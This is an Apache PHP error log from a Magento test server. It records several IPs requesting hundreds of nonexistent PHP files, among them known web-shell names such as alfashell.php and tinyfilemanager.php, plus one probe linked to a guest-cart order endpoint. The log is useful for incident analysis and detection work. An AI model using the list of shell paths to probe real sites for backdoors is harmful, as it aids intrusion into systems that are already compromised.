[Thu Mar 26 01:51:19.432233 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/fffff.php' not found or unable to stat
[Thu Mar 26 01:51:19.449576 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/thh.php' not found or unable to stat
[Thu Mar 26 01:51:19.466043 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/yellow.php' not found or unable to stat
[Thu Mar 26 01:51:19.484402 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/wfile.php' not found or unable to stat
[Thu Mar 26 01:51:19.501657 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/class20.php' not found or unable to stat
[Thu Mar 26 01:51:19.517961 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/build.php' not found or unable to stat
[Thu Mar 26 01:51:19.540254 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file1.php' not found or unable to stat
[Thu Mar 26 01:51:19.558223 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/520.php' not found or unable to stat
[Thu Mar 26 01:51:19.574504 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file18.php' not found or unable to stat
[Thu Mar 26 01:51:19.592960 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/ffile.php' not found or unable to stat
[Thu Mar 26 01:51:19.611949 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/vee.php' not found or unable to stat
[Thu Mar 26 01:51:19.629238 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/efile.php' not found or unable to stat
[Thu Mar 26 01:51:19.645656 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/afile.php' not found or unable to stat
[Thu Mar 26 01:51:19.662626 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/lites.php' not found or unable to stat
[Thu Mar 26 01:51:19.679164 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/0x.php' not found or unable to stat
[Thu Mar 26 01:51:19.696094 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/bless3.php' not found or unable to stat
[Thu Mar 26 01:51:19.712781 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/enclas.php' not found or unable to stat
[Thu Mar 26 01:51:19.729191 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/he.php' not found or unable to stat
[Thu Mar 26 01:51:19.745648 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/aves.php' not found or unable to stat
[Thu Mar 26 01:51:19.761891 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/cabs.php' not found or unable to stat
[Thu Mar 26 01:51:19.778651 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file88.php' not found or unable to stat
[Thu Mar 26 01:51:19.796828 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/xwx1.php' not found or unable to stat
[Thu Mar 26 01:51:19.813247 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/x1da.php' not found or unable to stat
[Thu Mar 26 01:51:19.829605 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/des.php' not found or unable to stat
[Thu Mar 26 01:51:19.846310 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/kaza.php' not found or unable to stat
[Thu Mar 26 01:51:19.862740 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/file51.php' not found or unable to stat
[Thu Mar 26 01:51:19.879520 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/blurbs15.php' not found or unable to stat
[Thu Mar 26 01:51:19.896105 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/bless11.php' not found or unable to stat
[Thu Mar 26 01:51:19.912442 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/security.php' not found or unable to stat
[Thu Mar 26 01:51:19.932734 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/ar.php' not found or unable to stat
[Thu Mar 26 01:51:19.949116 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/chosen.php' not found or unable to stat
[Thu Mar 26 01:51:19.968251 2026] [php:error] [pid 2944043] [client 4.232.184.93:3460] script '/var/www/magento.test.indacotrentino.com/www/pub/xoot.php' not found or unable to stat
[Thu Mar 26 02:19:11.319221 2026] [php:error] [pid 2943338] [client 198.186.131.58:58798] script '/var/www/magento.test.indacotrentino.com/www/pub/88364f428d25.php' not found or unable to stat, referer: https://autumnus.test.indacotrentino.com/rest/V1/guest-carts/758/order
[Thu Mar 26 02:19:11.473928 2026] [php:error] [pid 2943338] [client 198.186.131.58:58798] script '/var/www/magento.test.indacotrentino.com/www/pub/88364f428d25.php' not found or unable to stat, referer: https://autumnus.test.indacotrentino.com/88364f428d25.php
[Thu Mar 26 03:40:48.110535 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/gptsh.php' not found or unable to stat
[Thu Mar 26 03:40:48.308339 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/Zero.php' not found or unable to stat
[Thu Mar 26 03:40:48.504995 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/xocx.php' not found or unable to stat
[Thu Mar 26 03:40:48.701732 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/sace.php' not found or unable to stat
[Thu Mar 26 03:40:48.898564 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/up4.php' not found or unable to stat
[Thu Mar 26 03:40:49.108644 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-zx.php' not found or unable to stat
[Thu Mar 26 03:40:49.305320 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/north1.php' not found or unable to stat
[Thu Mar 26 03:40:49.502244 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/420.php' not found or unable to stat
[Thu Mar 26 03:40:49.701932 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fine.php' not found or unable to stat
[Thu Mar 26 03:40:49.899025 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/zample.php' not found or unable to stat
[Thu Mar 26 03:40:50.096114 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/read.php' not found or unable to stat
[Thu Mar 26 03:40:50.292965 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-kd4xalrg7m.php' not found or unable to stat
[Thu Mar 26 03:40:50.489922 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/hplfuns.php' not found or unable to stat
[Thu Mar 26 03:40:50.686971 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/xa.php' not found or unable to stat
[Thu Mar 26 03:40:50.883841 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/100.php' not found or unable to stat
[Thu Mar 26 03:40:51.080740 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/bless13.php' not found or unable to stat
[Thu Mar 26 03:40:51.277752 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-mter.php' not found or unable to stat
[Thu Mar 26 03:40:51.474708 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/inege.php' not found or unable to stat
[Thu Mar 26 03:40:51.671709 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/19.php' not found or unable to stat
[Thu Mar 26 03:40:51.868608 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fe5.php' not found or unable to stat
[Thu Mar 26 03:40:52.065634 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/file61.php' not found or unable to stat
[Thu Mar 26 03:40:52.277475 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/uuu.php' not found or unable to stat
[Thu Mar 26 03:40:52.474538 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/settings.php' not found or unable to stat
[Thu Mar 26 03:40:52.671604 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/sf.php' not found or unable to stat
[Thu Mar 26 03:40:52.868829 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/eee.php' not found or unable to stat
[Thu Mar 26 03:40:53.065700 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/no1.php' not found or unable to stat
[Thu Mar 26 03:40:53.262619 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/w2025.php' not found or unable to stat
[Thu Mar 26 03:40:53.459517 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/swallowable.php' not found or unable to stat
[Thu Mar 26 03:40:53.656204 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fvvff.php' not found or unable to stat
[Thu Mar 26 03:40:53.856434 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/a2.php' not found or unable to stat
[Thu Mar 26 03:40:54.053334 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/sty.php' not found or unable to stat
[Thu Mar 26 03:40:54.250133 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/txets.php' not found or unable to stat
[Thu Mar 26 03:40:54.446955 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/edit.php' not found or unable to stat
[Thu Mar 26 03:40:54.643854 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ioxi-o.php' not found or unable to stat
[Thu Mar 26 03:40:55.038197 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/66.php' not found or unable to stat
[Thu Mar 26 03:40:55.237026 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/a5.php' not found or unable to stat
[Thu Mar 26 03:40:55.435297 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/xmlrpc.php' not found or unable to stat
[Thu Mar 26 03:40:55.632107 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ol.php' not found or unable to stat
[Thu Mar 26 03:40:55.829230 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/f6.php' not found or unable to stat
[Thu Mar 26 03:40:56.026263 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/inputs.php' not found or unable to stat
[Thu Mar 26 03:40:56.229819 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/style.php' not found or unable to stat
[Thu Mar 26 03:40:56.426929 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/bgymj.php' not found or unable to stat
[Thu Mar 26 03:40:56.624112 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/aa.php' not found or unable to stat
[Thu Mar 26 03:40:56.822471 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/1.php' not found or unable to stat
[Thu Mar 26 03:40:57.019442 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/av.php' not found or unable to stat
[Thu Mar 26 03:40:57.413597 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/file59.php' not found or unable to stat
[Thu Mar 26 03:40:57.610962 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/bless5.php' not found or unable to stat
[Thu Mar 26 03:40:57.807801 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-act.php' not found or unable to stat
[Thu Mar 26 03:40:58.004709 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/xqq.php' not found or unable to stat
[Thu Mar 26 03:40:58.202090 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/plss3.php' not found or unable to stat
[Thu Mar 26 03:40:58.399160 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/aaa.php' not found or unable to stat
[Thu Mar 26 03:40:58.596982 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/classwithtostring.php' not found or unable to stat
[Thu Mar 26 03:40:58.991651 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/tinyfilemanager.php' not found or unable to stat
[Thu Mar 26 03:40:59.188471 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ms.php' not found or unable to stat
[Thu Mar 26 03:40:59.385593 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-update.php' not found or unable to stat
[Thu Mar 26 03:40:59.582554 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/sbhu.php' not found or unable to stat
[Thu Mar 26 03:40:59.779168 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-blog.php' not found or unable to stat
[Thu Mar 26 03:40:59.976288 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/test1.php' not found or unable to stat
[Thu Mar 26 03:41:00.374162 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/166.php' not found or unable to stat
[Thu Mar 26 03:41:00.776300 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ms-edit.php' not found or unable to stat
[Thu Mar 26 03:41:00.973331 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/adminfuns.php' not found or unable to stat
[Thu Mar 26 03:41:01.170843 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/goods.php' not found or unable to stat
[Thu Mar 26 03:41:01.367686 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ms-edit.php' not found or unable to stat
[Thu Mar 26 03:41:01.564930 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/222.php' not found or unable to stat
[Thu Mar 26 03:41:01.959971 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/ff1.php' not found or unable to stat
[Thu Mar 26 03:41:02.156919 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fff.php' not found or unable to stat
[Thu Mar 26 03:41:02.550196 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/155.php' not found or unable to stat
[Thu Mar 26 03:41:02.751072 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/we.php' not found or unable to stat
[Thu Mar 26 03:41:02.947898 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/alpha.php' not found or unable to stat
[Thu Mar 26 03:41:03.144923 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/makeasmtp.php' not found or unable to stat
[Thu Mar 26 03:41:03.347851 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-michan.php' not found or unable to stat
[Thu Mar 26 03:41:03.545362 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-the.php' not found or unable to stat
[Thu Mar 26 03:41:03.939723 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/BDKR28WP.php' not found or unable to stat
[Thu Mar 26 03:41:04.336564 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-good.php' not found or unable to stat
[Thu Mar 26 03:41:04.536113 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/wp.php' not found or unable to stat
[Thu Mar 26 03:41:04.929970 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fe5.php' not found or unable to stat
[Thu Mar 26 03:41:05.129272 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/kj.php' not found or unable to stat
[Thu Mar 26 03:41:05.524403 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/av.php' not found or unable to stat
[Thu Mar 26 03:41:05.721527 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/abcd.php' not found or unable to stat
[Thu Mar 26 03:41:05.918273 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/init.php' not found or unable to stat
[Thu Mar 26 03:41:06.115149 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/fi.php' not found or unable to stat
[Thu Mar 26 03:41:06.312327 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/a1.php' not found or unable to stat
[Thu Mar 26 03:41:06.903292 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/f35.php' not found or unable to stat
[Thu Mar 26 03:41:07.495090 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/prv8.php' not found or unable to stat
[Thu Mar 26 03:41:07.701058 2026] [php:error] [pid 2946665] [client 20.151.11.236:8334] script '/var/www/magento.test.indacotrentino.com/www/pub/k.php' not found or unable to stat
[Thu Mar 26 03:41:08.194436 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/dev.php' not found or unable to stat
[Thu Mar 26 03:41:08.391206 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/bal.php' not found or unable to stat
[Thu Mar 26 03:41:08.588004 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/in.php' not found or unable to stat
[Thu Mar 26 03:41:08.784339 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/gssdd.php' not found or unable to stat
[Thu Mar 26 03:41:08.981073 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/motu.php' not found or unable to stat
[Thu Mar 26 03:41:09.177707 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/bs1.php' not found or unable to stat
[Thu Mar 26 03:41:09.373910 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/bengi.php' not found or unable to stat
[Thu Mar 26 03:41:09.766690 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/axx.php' not found or unable to stat
[Thu Mar 26 03:41:09.970671 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/alfashell.php' not found or unable to stat
[Thu Mar 26 03:41:10.167689 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/fm.php' not found or unable to stat
[Thu Mar 26 03:41:10.364379 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/flower.php' not found or unable to stat
[Thu Mar 26 03:41:10.561119 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/gettest.php' not found or unable to stat
[Thu Mar 26 03:41:10.757532 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/acp.php' not found or unable to stat
[Thu Mar 26 03:41:10.955542 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/sdm.php' not found or unable to stat
[Thu Mar 26 03:41:11.151964 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file52.php' not found or unable to stat
[Thu Mar 26 03:41:11.348600 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file48.php' not found or unable to stat
[Thu Mar 26 03:41:11.545092 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/s.php' not found or unable to stat
[Thu Mar 26 03:41:11.741666 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/g.php' not found or unable to stat
[Thu Mar 26 03:41:12.133987 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/simple.php' not found or unable to stat
[Thu Mar 26 03:41:12.331262 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/atomlib.php' not found or unable to stat
[Thu Mar 26 03:41:12.527642 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/hla.php' not found or unable to stat
[Thu Mar 26 03:41:12.724046 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/ew.php' not found or unable to stat
[Thu Mar 26 03:41:12.921284 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/css.php' not found or unable to stat
[Thu Mar 26 03:41:13.117800 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/goat1.php' not found or unable to stat
[Thu Mar 26 03:41:13.314691 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file21.php' not found or unable to stat
[Thu Mar 26 03:41:13.511445 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/class19.php' not found or unable to stat
[Thu Mar 26 03:41:13.707898 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/fffff.php' not found or unable to stat
[Thu Mar 26 03:41:13.905463 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/thh.php' not found or unable to stat
[Thu Mar 26 03:41:14.102233 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/yellow.php' not found or unable to stat
[Thu Mar 26 03:41:14.302710 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/wfile.php' not found or unable to stat
[Thu Mar 26 03:41:14.499606 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/class20.php' not found or unable to stat
[Thu Mar 26 03:41:14.696392 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/build.php' not found or unable to stat
[Thu Mar 26 03:41:14.895397 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file1.php' not found or unable to stat
[Thu Mar 26 03:41:15.092304 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/520.php' not found or unable to stat
[Thu Mar 26 03:41:15.288942 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file18.php' not found or unable to stat
[Thu Mar 26 03:41:15.485573 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/ffile.php' not found or unable to stat
[Thu Mar 26 03:41:15.682916 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/vee.php' not found or unable to stat
[Thu Mar 26 03:41:15.883932 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/efile.php' not found or unable to stat
[Thu Mar 26 03:41:16.080388 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/afile.php' not found or unable to stat
[Thu Mar 26 03:41:16.278308 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/lites.php' not found or unable to stat
[Thu Mar 26 03:41:16.474928 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/0x.php' not found or unable to stat
[Thu Mar 26 03:41:16.671307 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/bless3.php' not found or unable to stat
[Thu Mar 26 03:41:16.868699 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/enclas.php' not found or unable to stat
[Thu Mar 26 03:41:17.086100 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/he.php' not found or unable to stat
[Thu Mar 26 03:41:17.282769 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/aves.php' not found or unable to stat
[Thu Mar 26 03:41:17.479334 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/cabs.php' not found or unable to stat
[Thu Mar 26 03:41:17.675998 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file88.php' not found or unable to stat
